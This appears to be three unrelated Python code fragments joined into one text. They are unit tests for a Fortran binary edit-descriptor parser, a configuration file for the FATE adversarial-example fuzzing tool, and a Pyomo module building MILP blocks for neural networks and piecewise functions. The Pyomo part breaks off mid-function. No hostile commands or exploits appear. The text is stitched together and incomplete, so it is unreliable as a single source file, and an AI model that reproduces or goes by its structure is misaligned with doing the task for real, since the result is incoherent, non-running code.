def test_b_ed_input_928(self):
inp = '''1000'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_929(self):
inp = '''-1000'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_930(self):
inp = '''10000'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_931(self):
inp = '''-10000'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_932(self):
inp = '''100000'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_933(self):
inp = '''-100000'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_934(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_935(self):
inp = '''10101000'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_936(self):
inp = '''0'''
fmt = '''(1B3)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_937(self):
inp = '''-0'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_938(self):
inp = '''1'''
fmt = '''(1B3)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_939(self):
inp = '''-1'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_940(self):
inp = '''2'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_941(self):
inp = '''10'''
fmt = '''(1B3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_942(self):
inp = '''-10'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_943(self):
inp = '''100'''
fmt = '''(1B3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_944(self):
inp = '''-100'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_945(self):
inp = '''1000'''
fmt = '''(1B3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_946(self):
inp = '''-1000'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_947(self):
inp = '''10000'''
fmt = '''(1B3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_948(self):
inp = '''-10000'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_949(self):
inp = '''100000'''
fmt = '''(1B3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_950(self):
inp = '''-100000'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_951(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(1B3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_952(self):
inp = '''10101000'''
fmt = '''(1B3)'''
result = [5]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
| |
# Global configuration for the FATE fuzzing experiments.
# The toggles below select the run mode; many later flags are derived from
# them with `and`/`or` expressions, so flip only the literal True/False here.
import os
from os.path import join
INVESTIGATE = False # Records coverages and saves them. Generates a plot in the end. Do not use with automate.
TEST_OUTSIDE_FUZZER = False # Runs FATE as standalone (1+1) EA
BLACKBOX = True and TEST_OUTSIDE_FUZZER # Disables white-box information such as thresholds and feat imp.
FORCE_DEFAULT_EPSILON = True or TEST_OUTSIDE_FUZZER # Runs all datasets with the default epsilon
FORCE_DEFAULT_MUTATION_CHANCE = False or TEST_OUTSIDE_FUZZER # Runs all datasets with the default mutation chance
LIMIT_TIME = True # If false, run 10 times as long
############ FATE Standalone ############
CROSSOVER_CHANCE = 0.001 # Chance that crossover occurs
CROSSOVER_RANDOM_CHANCE = 1.0 # Actual chance for crossover with random features is 0.001 =
# CROSSOVER_CHANCE * CROSSOVER_RANDOM_CHANCE
NUM_RUNS = 100000000 # Unlimited. Change for smaller amount of runs
POPULATION_SIZE = 1 # Population size.
############ RQ 1 defaults ############
MEASURE_EXEC_P_S = True # Parse the number of executions per second.
ALLOW_FLOAT_MIS_CLASSIFICATION = True # If True, do not filter mis-classifications from the produced AE
CONSISTENT_DRAWS = True # Seeds random with 0, to create consistent check-set draws
FUZZ_ONE_POINT_PER_INSTANCE = True # compile to generic fuzz target and fuzz per point
USE_CUSTOM_MUTATOR = True # If False, use the standard mutator of LibFuzzer
USE_CROSSOVER = True and USE_CUSTOM_MUTATOR # Combines mutation with crossover (split at random location)
USE_GAUSSIAN = True # Gaussian vs random uniform mutation
USE_PROBABILITY_STEPS_SPECIAL = True # Proba descent based on small proba diff between 2nd class predicted
PROBA_LIMIT_WITHIN_EPSILON = True # Only save seeds if within epsilon
WRITE_AE_ONLY_IF_BETTER_OUTSIDE_BRANCHES = True # Saves execution time
ALWAYS_OPTIMIZE = True # Otherwise only optimize small files
MUTATE_DEPTH = 7 if TEST_OUTSIDE_FUZZER else 5 # The maximum number of consecutive mutations per seed for LibFuzzer
DEFAULT_EPSILON = 0.1 if TEST_OUTSIDE_FUZZER else 0.2 # Default epsilon
DEFAULT_MUTATE_CHANCE = 0.5 if TEST_OUTSIDE_FUZZER else 0.1 # Chance that a single feature is mutated
# Select the active fuzzer by uncommenting exactly one FUZZER line.
FUZZER = 'libFuzzer'
# FUZZER = 'AFL++'
# FUZZER = 'honggfuzz'
# FUZZER = 'AFLGo'
FUZZERS = ['libFuzzer', 'AFL++', 'AFLGo', 'honggfuzz']
if FUZZER not in FUZZERS:
    raise ValueError(f'Fuzzer {FUZZER} not recognised, should be one of [{", ".join(FUZZERS)}]')
if FUZZER == 'honggfuzz' and USE_CUSTOM_MUTATOR:
    raise ValueError('Honggfuzz and custom mutator is not supported')
############ RQ 2 defaults ############
AE_MUTATE_TOWARDS_VICTIM = True # If AE, mutate values only towards victim point.
MUTATE_BIGGEST_CHANCE = 0.5 # When an AE is found, the chance to only mutate all biggest difference fs towards victim
ALSO_MUTATE_BIGGEST = True # Always mutate all features > the biggest l-inf distance - 0.01. Only with FUZZ_ONE
# These alter the chance that a feature is mutated
BIAS_MUTATE_BIG_DIFFS = True
USE_THRESHOLDS_FOR_MUTATION = True and not BLACKBOX # move to optimal boundary value after drawing from mutation dist
# Fuzzes for each datapoint with and without AE init
DOUBLE_FUZZ_WITH_AE = True and not (TEST_OUTSIDE_FUZZER or INVESTIGATE)
USE_FEATURE_IMPORTANCE = True and not BLACKBOX # prioritize more important features for mutation
INITIALIZE_WITH_POINT_IN_BETWEEN = True and DOUBLE_FUZZ_WITH_AE
INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN = True and INITIALIZE_WITH_POINT_IN_BETWEEN
if TEST_OUTSIDE_FUZZER and (not FUZZ_ONE_POINT_PER_INSTANCE):
    raise ValueError('Test outside fuzzer conflicting options')
if TEST_OUTSIDE_FUZZER and DOUBLE_FUZZ_WITH_AE and (POPULATION_SIZE < 2 or CROSSOVER_RANDOM_CHANCE > 0.99):
    raise ValueError('Test outside fuzzer double fuzz configuration problem')
############ RQ 1.2 defaults ############
FILTER_BAD_AE = True # If True, discards all AE that are worse than FAILURE_THRES
FUZZ_ONLY_COV_FOR_FOREST = False # Only insert coverage-guidance for the lines that belong to the Forest
FUZZ_ONLY_COV_FOR_CHECK = True # Only insert coverage-guidance for the lines that belong to the objective function
FUZZ_WITHOUT_COVERAGE_GUIDANCE = False # If True, baseline: removes almost all coverage guidance (except TestOneInput)
if FUZZER == 'AFL++' and FUZZ_WITHOUT_COVERAGE_GUIDANCE:
    raise ValueError('AFL++ crashes because the fuzzer name cannot be set with the -n (no instrument) option')
############ Objective function settings ############
COMBINE_DISTANCE_AND_PROBABILITY = False # distance = distance + probability
USE_PROBABILITY_STEPS = False # probability steps in the check function ELSE branch
PROBA_SPECIAL_ALWAYS = False
PROBA_SPECIAL_START_STEP = 0.2
PROBA_SPECIAL_STEP_SIZE = 0.01
WRITE_AE_ALWAYS_IN_IF = False # Slower option for the objective function
if USE_PROBABILITY_STEPS and USE_PROBABILITY_STEPS_SPECIAL:
    raise ValueError('Select at most one type of probability step')
if WRITE_AE_ALWAYS_IN_IF and WRITE_AE_ONLY_IF_BETTER_OUTSIDE_BRANCHES:
    raise ValueError('Only one write_X can be used on the settings')
############ Fuzzer settings ############
NEVER_OPTIMIZE = False
FORCE_ENTROPIC = False # libfuzzer. Experimental. Enables entropic power schedule.
NO_ENTROPIC = False
FOCUS_FUNCTION = "0" # focus_function 0 Experimental. Fuzzing will focus on inputs that trigger calls
# to this function. If -focus_function=auto and -data_flow_trace is used, libFuzzer will choose the
# focus functions automatically.
if sum([FUZZ_WITHOUT_COVERAGE_GUIDANCE, FUZZ_ONLY_COV_FOR_CHECK, FUZZ_ONLY_COV_FOR_FOREST]) > 1:
    raise ValueError('Only one coverage guidance option can be used at the same time')
if NEVER_OPTIMIZE and ALWAYS_OPTIMIZE:
    raise ValueError('Conflicting optimize options')
############ AFL settings ############
# TIME_NO_NEW_COV = 10
IS_AE_CHANCE = 0.5 # Because we cannot access the fuzzer logic in the mutator
NUM_CYCLES_IN_LOOP = 1000 # Number of consecutive iterations after which we start with a clean sheet
AFL_USE_DICT = True and not USE_CUSTOM_MUTATOR
AFL_USE_CMP_LOG = False and not USE_CUSTOM_MUTATOR
ENABLE_DETERMINISTIC = False
SKIP_DETERMINISTIC = False
# see docs/power_schedules.md
AFL_SCHEDULE = None # one of fast(default, use None), explore, exploit, seek, rare, mmopt, coe, lin, quad
# AFL generic
AFL_MUTATE_FILENAME = "afl_mutation.cc"
AFL_OUTPUT_DIR = "afl_out"
# AFL++
AFLPP_DICT_PATH = join(os.getcwd(), 'afl_dict')
AFLPP_TEMPLATE_PATH = "templates/aflpp.jinja2"
MUTATE_TEMPLATE_PATH = "templates/mutate.jinja2"
AFLPP_COMPILER_PATH = "afl-clang-lto++"
# AFLPP_COMPILER_PATH = "afl-clang-fast++"
# AFLGo
AFL_GO_COMPILER_PATH = "/home/cas/AFLGo/afl-clang-fast++"
AFL_GO_FUZZ_PATH = "/home/cas/AFLGo/afl-fuzz"
AFL_GO_GEN_DIST_PATH = "/home/cas/AFLGo/scripts/gen_distance_fast.py"
AFL_GO_TARGETS_FILE = 'BBtargets.txt'
AFLGO_TEMPLATE_PATH = "templates/aflgo.jinja2"
############ honggfuzz settings ############
HONG_COMPILER_PATH = "/home/cas/honggfuzz/hfuzz_cc/hfuzz-clang++"
HONG_FUZZER_PATH = "/home/cas/honggfuzz/honggfuzz"
HONG_OUTPUT_DIR = "hongg_out"
############ Mutation settings ############
MINIMIZE_THRESHOLD_LIST = False # Removes all thresholds within 0.0001 from each other
IS_AE_FAKE = False # Fakes the model query if the current input is an AE
USE_WAS_AE = False # Saves the result of the last known model query
STEEP_CURVE = False # If True, square the draw from the gaussian distribution, such that smaller draws are more likely
# feature importance is calculated by its occurrence
FEATURE_IMPORTANCE_BASED_ON_OCCURRENCE = False and USE_FEATURE_IMPORTANCE
MUTATE_LESS_WHEN_CLOSER = False # When True, multiplies mutation with largest diff between fuzzed and victim.
# Cannot be true together with AE_MUTATE_TOWARDS_VICTIM (checked below).
# AE_CHECK_IN_MUTATE: the custom mutator needs to know whether the current
# input is an AE whenever any of the AE-aware strategies is active.
AE_CHECK_IN_MUTATE = (ALSO_MUTATE_BIGGEST or BIAS_MUTATE_BIG_DIFFS or USE_THRESHOLDS_FOR_MUTATION or
                      AE_MUTATE_TOWARDS_VICTIM or MUTATE_LESS_WHEN_CLOSER) and FUZZ_ONE_POINT_PER_INSTANCE \
                     and FUZZER != 'AFL++'
if MUTATE_LESS_WHEN_CLOSER and AE_MUTATE_TOWARDS_VICTIM:
    raise ValueError('Mutate less and AE mutate towards original cannot be used together')
############ AE init ############
# k-ANN structure
ANN_TREES = 10 # the amount of trees for the "annoy" lookup
K_ANN = 10 # how many nearest neighbours to find
NO_SEED_INIT = False # When True, each run is only seeded with all-0 features. No input is not possible, because
# the custom mutator would otherwise break.
INITIALIZE_WITH_AE = False # use ANN to seed with K_ANN closest data-points from other classes
INITIALIZE_WITH_AVG_OPPOSITE = False # For binary-classification: seed with average member of the other class
INITIALIZE_WITH_POINT_IN_BETWEEN = INITIALIZE_WITH_POINT_IN_BETWEEN or \
                                   (True and INITIALIZE_WITH_AE)
INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN = INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN or \
                                          (True and INITIALIZE_WITH_POINT_IN_BETWEEN)
INITIALIZE_WITH_FULL_TRAIN_SET = False # Put all instances of other class from test set in corpus.
if INITIALIZE_WITH_FULL_TRAIN_SET and (INITIALIZE_WITH_AE or DOUBLE_FUZZ_WITH_AE):
    raise ValueError('INITIALIZE_WITH_FULL_TRAIN_SET cannot be used with INITIALIZE_WITH_AE or DOUBLE_FUZZ_WITH_AE')
if sum([INITIALIZE_WITH_AE, INITIALIZE_WITH_AVG_OPPOSITE, INITIALIZE_WITH_FULL_TRAIN_SET]) > 1:
    raise ValueError('Conflicting initialize options')
############ Testing ############
DEBUG = False # If True, shows output and runs 1 sample with 1 thread only.
MEASURE_COVERAGE = False # Measure coverage through instrumentation, costs exec/s
SKIP_COMPILATION = False
COMPILE_ONLY = False
PRINT_NUMBER_OF_LEAVES = False # Estimate for model size
INVESTIGATE_WITH_SCATTER = False and INVESTIGATE # Shows a scatter plot instead of a line plot when INVESTIGATE
NUM_INVESTIGATE_RUNS = 5 # The number of repetitions for creating plots.
FAILURE_THRES = 0.9 # See FILTER_BAD_AE
SHOW_OUTPUT = False or DEBUG # Shows fuzzer output
CREATE_LOOKUP = False or INITIALIZE_WITH_AE or INITIALIZE_WITH_AVG_OPPOSITE or INVESTIGATE \
                or INITIALIZE_WITH_FULL_TRAIN_SET or DOUBLE_FUZZ_WITH_AE
if DEBUG and MEASURE_EXEC_P_S:
    raise ValueError('Debug and measure exec/s cannot be used at the same time')
if INVESTIGATE and DOUBLE_FUZZ_WITH_AE:
    raise ValueError('Double fuzz together with investigate should not be used.')
NUM_DEBUG = 1
NUM_THREADS = 10 if not DEBUG else NUM_DEBUG # Number of simultaneous fuzzing instances, but is also
# used for training the ensembles, the MILP attack and the lt-attack (Zhang)
NUM_ADV_SUPER_QUICK = 10 # The number of victims to attack for runs with the -qq flag.
NUM_ADV_QUICK = 50 # The number of victims to attack for runs with the -q flag.
NUM_ADV_CHECKS = 500 if not DEBUG else NUM_DEBUG # number of adversarial victims
MAX_POINTS_LOOKUP = 5000 # The AE lookup will be created over this amount of training samples maximum
DEFAULT_TIME_PER_POINT = 1 # The default fuzzing time per datapoint
MODEL_TYPES = ['RF', 'GB'] # the identifiers of the model types (Random Forest, Gradient Boosting)
DISTANCE_NORMS = ['l_0', 'l_1', 'l_2', 'l_inf']
DISTANCE_NORM = 'l_inf'
# LinearParametrization.py
from pyomo.environ import *
from pyomo.core import (Block,
Var,
Constraint,
RangeSet,
NonNegativeReals,
Binary)
import pandas as pd
import numpy as np
import numbers
from sklearn.linear_model import LinearRegression
from scipy.spatial import Delaunay, ConvexHull
from sklearn.metrics import mean_absolute_error
from sklearn.preprocessing import StandardScaler
def NN_Block(t,dfI,nn,scaler,*ext):
    """Build a Pyomo Block that embeds a trained sklearn MLP (single hidden
    layer) as MILP constraints over the time set *t*.

    Args:
        t: Pyomo time set to index the block variables.
        dfI: DataFrame whose columns are the input variables plus the output
            variable (last column); its rows also define the convex hull
            that bounds the admissible inputs.
        nn: fitted MLP with one hidden layer ('relu' or 'identity'
            activation); coefs_/intercepts_ are read directly.
        scaler: fitted StandardScaler (mean_/scale_) used to de-normalise
            the network's inputs and output inside the constraints.
        *ext: optional single dict {var_name: value} of equality bounds.

    Returns:
        The populated Block. b.Stage is a Binary variable that switches the
        whole block on (1) or off (0): every constraint is scaled by it.

    Raises:
        ValueError: on unsupported activation or zero-dimensional data.
    """
    var_names = dfI.columns
    b = Block(concrete=True)
    b.t = t
    # 1. Declare the block variables.
    b.Vars = Var(b.t, var_names)
    b.Stage = Var(within=Binary)
    b.VarNames = var_names
    n_hidden = nn.hidden_layer_sizes
    b.dimensions = RangeSet(0, n_hidden-1)
    b.H = Var(b.dimensions, b.t, bounds=(-10000,10000))   # pre-activation
    b.aH = Var(b.dimensions, b.t, bounds=(-10000,10000))  # post-activation
    # 2. Hidden layer: standardised inputs times first-layer weights,
    # gated by Stage so a disabled block forces H to 0.
    def hidden_rule(b, i, t):
        expr = 0
        for k, var in enumerate(var_names[0:-1]):
            expr += (b.Vars[t,var] - b.Stage*scaler.mean_[k])/scaler.scale_[k]*nn.coefs_[0][k,i]
        return (expr + b.Stage*nn.intercepts_[0][i] == b.H[i,t])
    b.c_srr = Constraint(b.dimensions, b.t, rule=hidden_rule)
    # Activation function: aH = max(0, H) for relu, aH = H for identity,
    # encoded as a 3-point SOS2 piecewise-linear relation.
    if nn.activation == 'relu':
        xdata = [-10000., 0., 10000.]
        ydata = [     0., 0., 10000.]
    elif nn.activation == 'identity':
        xdata = [-10000., 0., 10000.]
        ydata = [-10000., 0., 10000.]
    else:
        raise ValueError('Only relu and identity activation functions are allowed for neural network')
    b.Cons = Piecewise(b.dimensions, b.t, b.aH, b.H, pw_pts=xdata, pw_constr_type="EQ", f_rule=ydata, pw_repn="SOS2")
    # Output layer: de-normalised weighted sum of activations equals the
    # output variable (last column of dfI).
    def c_y(b, t):
        return (sum(b.aH[i,t]*nn.coefs_[1][i][0] for i in b.dimensions) +
                b.Stage*nn.intercepts_[1][0])*scaler.scale_[-1] + b.Stage*scaler.mean_[-1] == b.Vars[t,var_names[-1]]
    b.c_y = Constraint(b.t, rule = c_y)
    # 3. Restrict the inputs to the convex hull of the training data.
    if nn.coefs_[0].shape[0]>1:
        hullPoints = ConvexHull(np.array(dfI)[:,:-1])
        planes = np.unique(hullPoints.equations,axis=0)
    elif nn.coefs_[0].shape[0]==1:
        # 1-D input: the "hull" is just the [min, max] interval.
        planes = np.array([[-1,dfI.iloc[:,0].min()],[1,-dfI.iloc[:,0].max()]])
    else:
        raise ValueError('Zero_dimension data')
    b.c_ch = ConstraintList()
    for t_ in b.t:
        for i in range(planes.shape[0]):
            pl = planes[i]
            expr = 0
            for k, var in enumerate(var_names[0:-1]):
                expr += b.Vars[t_,var]*pl[k]
            # pl[-1] is the plane offset; -1e-4 tightens the facet slightly.
            b.c_ch.add(expr <= b.Stage*(-1e-4-pl[-1]))
    # 4. Optional equality bounds on selected variables.
    if len(ext)>0:
        ext_bounds = ext[0]  # dict {var_name: fixed value}
        def c_Ext(b,t,ExtVar):
            return b.Vars[t,ExtVar] == b.Stage*ext_bounds[ExtVar]
        # Only build constraints for names actually present in var_names.
        fixed = [name for name in var_names if name in ext_bounds]
        b.c_ExtConst = Constraint(b.t, fixed, rule = c_Ext)
    return b
def CH_Block(t,df,*ext):
    """Build a Pyomo Block modelling df's last column as a linear regression
    of the remaining columns, with the inputs restricted to the convex hull
    of the observed data. b.Stage (Binary) gates the whole block on/off.
    *ext* may carry one dict {var_name: value} of equality bounds."""
    Values = df.values
    Vars = list(df.columns)
    b = Block(concrete=True)
    ValsX = Values[:,:-1]
    ValsF = Values[:,-1]
    # 1. Declare the block variables.
    b.Vars = Var(t, Vars)
    b.Stage = Var(within=Binary)
    b.VarNames = Vars
    b.t=t
    # 2. Fit a linear regression of the output surface.
    lm = LinearRegression()
    lm.fit(ValsX,ValsF)
    coeff = np.append(lm.coef_, np.array(-1))  # trailing -1 multiplies the output var
    def c_D0_(b,t):
        expr = b.Stage * lm.intercept_
        k=0
        for var in Vars:
            expr += b.Vars[t,var]*coeff[k]
            k=k+1
        return expr==0
    b.c_F = Constraint(t,rule=c_D0_)
    # 3. Restrict the inputs to the convex hull of the data.
    if len(Vars)>2:
        hullPoints = ConvexHull(np.array(df)[:,:-1])
        planes = np.unique(hullPoints.equations,axis=0)
    elif len(Vars)==2:
        # 1-D input: the "hull" is just the [min, max] interval.
        planes = np.array([[-1,ValsX[:,0].min()],[1,-ValsX[:,0].max()]])
    else:
        raise ValueError('Zero_dimension data')
    b.c_ch = ConstraintList()
    for t_ in t:
        for i in range(planes.shape[0]):
            pl=planes[i]
            Expr=0
            k=0
            for var in Vars[0:-1]:
                Expr += b.Vars[t_,var]*pl[k]
                k+=1
            # After the loop k indexes the plane's offset term.
            Expr = Expr <= b.Stage*(-1e-4-pl[k])
            b.c_ch.add(Expr)
    # 4. Optional equality bounds on selected variables.
    if len(ext)>0:
        extD=ext[0] # dict {var_name: fixed value}
        def c_Ext(b,t,ExtVar):
            return b.Vars[t,ExtVar] == b.Stage*extD[ExtVar]
        # Only keep names that are actual block variables.
        Ext = []
        for n in Vars:
            if n in extD:
                Ext.append(n)
        # One equality constraint per time step and listed variable.
        b.c_ExtConst = Constraint(t, Ext, rule = c_Ext)
    return b
def BuildPiecewise1D_1S(var_,namevar,x,zvals,t,stage):
    """SOS2-style piecewise-linear block for a 1-D characteristic.

    Ties var_[t, namevar[0]] (input) and var_[t, namevar[-1]] (output) to
    the sampled curve (x, zvals) through convex-combination weights; the
    *stage* variable gates the block (all sums equal stage, so stage == 0
    forces the block to zero).
    """
    b = Block(concrete=True)
    npoints = len(zvals)
    nt = len(t)
    b.vertices = RangeSet(0, npoints-1)
    b.simplices = RangeSet(0, npoints-2)  # segments between adjacent points
    b.t = RangeSet(0, nt-1)
    b.lmda = Var(b.vertices, b.t, within=NonNegativeReals)
    b.y = Var(b.simplices, b.t, within=Binary)
    # Convexity: the lambdas sum to stage.
    def lmbda_summ_rule(b,t):
        return sum(b.lmda[v,t] for v in b.vertices) == stage
    b.convex_c=Constraint(b.t, rule=lmbda_summ_rule)
    # Output: z = sum(z_i * lambda_i)
    def z_var_rule(b,t):
        return var_[t,namevar[-1]] == sum(zvals[v]*b.lmda[v,t] for v in b.vertices)
    b.output_c=Constraint(b.t, rule=z_var_rule)
    # Input: x = sum(x_i * lambda_i)
    def x_var_rule(b,t):
        return var_[t,namevar[0]] == sum(x[v]*b.lmda[v,t] for v in b.vertices)
    # NOTE: attribute name 'inpuit_c' (sic) kept for backward compatibility.
    b.inpuit_c=Constraint(b.t, rule=x_var_rule)
    # Adjacency: only the two lambdas of the selected segment may be non-zero.
    vertex_to_simplex = [[] for v in b.vertices]
    simplices = [[v,v+1] for v in b.vertices]
    simplices=simplices[:-1]  # the last vertex starts no segment
    for s, simplex in enumerate(simplices):
        for v in simplex:
            vertex_to_simplex[v].append(s)
    def vertex_regions_rule(b,v,t):
        return b.lmda[v,t] <= sum(b.y[s,t] for s in vertex_to_simplex[v])
    b.vertex_regions_c =Constraint(b.vertices, b.t, rule=vertex_regions_rule)
    # Exactly one segment is active per time step (zero when stage == 0).
    def single_region_rule(b,t):
        return sum(b.y[s,t] for s in b.simplices) == stage
    b.single_region_c = Constraint(b.t,rule=single_region_rule)
    return b
    # NOTE(review): an unreachable duplicate of the last three constraint
    # definitions (referencing stage[t] and a stale vertex_to_simplex)
    # previously followed this return statement; it was dead code and has
    # been removed.
def BuildPiecewiseND_1S(vars_, namevars, tri, zvals,t,stage):
    """
    Builds constraints defining a N-dimensional
    piecewise representation of the given triangulation.
    Args:
        vars_: Indexed Pyomo Var holding both the input
            variables (namevars[:-1]) and the output
            variable (namevars[-1]), indexed by (t, name).
        namevars: Sequence of variable names; the last
            entry names the piecewise function's output.
        tri: A triangulation over the discretized
            variable domain. Required attributes:
         - points: An (npoints, D) shaped array listing the
             D-dimensional coordinates of the
             discretization points.
         - simplices: An (nsimplices, D+1) shaped array of
             integers specifying the D+1 indices
             of the points vector that define
             each simplex of the triangulation.
        zvals: An (npoints, 1) shaped array listing the
            value of the piecewise function at each of
            coordinates in the triangulation points
            array.
        t: Iterable whose length defines the block's time set.
        stage: Binary Pyomo Var (or constant) gating the block;
            the convexity and region sums equal *stage*.
    Returns:
        A Pyomo Block object containing variables and
        constraints that define the piecewise function.
    """
    b = Block(concrete=True)
    nt=len(t)
    ndim = len(namevars)-1
    nsimplices = len(tri.simplices)
    npoints = len(tri.points)
    pointsT = list(zip(*tri.points))  # coordinates transposed: one tuple per dimension
    # create index objects
    # Input dimensions, e.g. [X Y Z]
    b.dimensions = RangeSet(0, ndim-1)
    # Simplices (polygons) of the triangulation
    b.simplices = RangeSet(0, nsimplices-1)
    # Discretization points
    b.vertices = RangeSet(0, npoints-1)
    # Time steps
    b.t=RangeSet(0,nt-1)
    # create variables
    # Convex-combination weights
    b.lmda = Var(b.vertices,b.t, within=NonNegativeReals)
    # y[s] == 1 when simplex s is the active region
    b.y = Var(b.simplices,b.t, within=Binary)
    # create constraints
    # Each input equals the lambda-weighted sum of point coordinates:
    # X = sum(X[i]*lambda[i]), Y = sum(Y[i]*lambda[i]), ...
    # d indexes the dimension within [X Y Z].
    def input_c_rule(b, d,t):
        pointsTd = pointsT[d]
        return vars_[t,namevars[d]] == sum(pointsTd[v]*b.lmda[v,t]
                                           for v in b.vertices)
    b.input_c = Constraint(b.dimensions, b.t, rule=input_c_rule)
    # Output: F = sum(F[i]*lambda[i])
    def z_var_rule(b,t):
        return vars_[t,namevars[-1]] == sum(zvals[v]*b.lmda[v,t] for v in b.vertices)
    b.output_c=Constraint(b.t, rule=z_var_rule)
    # Convexity: sum(lambda[i]) == stage (stage == 0 disables the block)
    def lmbda_summ_rule(b,t):
        return sum(b.lmda[v,t] for v in b.vertices) == stage
    b.convex_c=Constraint(b.t, rule=lmbda_summ_rule)
    # generate a map from vertex index to simplex index,
    # which avoids an n^2 lookup when generating the
    # constraint lambda[i] <= sum(y[simplices adjacent to vertex i])
    vertex_to_simplex = [[] for v in b.vertices]
    for s, simplex in enumerate(tri.simplices):
        for v in simplex:
            vertex_to_simplex[v].append(s)
    def vertex_regions_rule(b, v,t):
        return b.lmda[v,t] <= \
            sum(b.y[s,t] for s in vertex_to_simplex[v])
    b.vertex_regions_c = \
        Constraint(b.vertices,b.t, rule=vertex_regions_rule)
    # Exactly one region is active per time step:
    # sum(y[s]) == stage
    def single_region_rule(b,t):
        return sum(b.y[s,t] for s in b.simplices) == stage
